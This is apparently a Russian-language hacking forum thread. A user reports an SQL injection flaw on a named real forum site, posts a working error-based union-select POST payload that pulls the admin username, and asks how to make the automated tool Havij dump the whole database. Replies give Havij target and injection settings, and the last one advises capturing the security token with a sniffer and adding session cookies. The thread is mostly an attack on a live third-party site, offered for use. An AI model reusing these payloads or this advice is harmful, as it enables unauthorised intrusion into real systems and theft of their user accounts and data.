Ребят,такой вопрос...нашел я уязвимость в форуме одного сайта(сам не мастер скулей )...иньекция способом PoST... к примеру, http://www.way2forums.com/search.php?do=process Post-data: Code: contenttypeid=5&categoryid[]=-99)%20union%20select%20username%20from%20user%20where%20userid=1%20and%20row(1,1)%3E(select%20count(*),concat(%20(select%20user.username)%20,0x3a,floor(rand(0)*2))%20x%20from%20(select%201%20union%20select%202%20union%20select%203)a%20group%20by%20x%20limit%201)%20--%20/* незамысловато,можно получить логин админа...но вот думал получить список всех таблиц... вставляю ссылку и данные в Havji,а он тупо перебирает колонки и останавливается... повторюсь,я не профи...ребят,подскажите,плз,как сделать,чтоб havji её хавал...может данные ещё какие передавать или в настройках подправить куки или д.р.?
Target: http://www.way2forums.com/search.php?do=process Post: contenttypeid=5&categoryid[]=-99)%Inject_Here% Type: Error-based P.S. HaKoU Te6E ToT CauT? 4K MeM6ePoB... Profit 0.
да,я так,для саморазвития...) ...однако.. вставил в Target: http://www.way2forums.com/search.php?do=process в Post: contenttypeid=5&categoryid[]=-99)%Inject_Here% Database: MySQL error based Type: Auto Detect ...и он её всё равно не схавал... [ Havji (1.15) отвязанная ]
Я для примера показал. А так для этой уязвимости нужен securytoken или как там. Ну вообщем поищи любое слово, посмотри запрос через любой сниффер, да вставь в Havij. Ах да, куки вставить не забудь, если через авторизованного пользователя.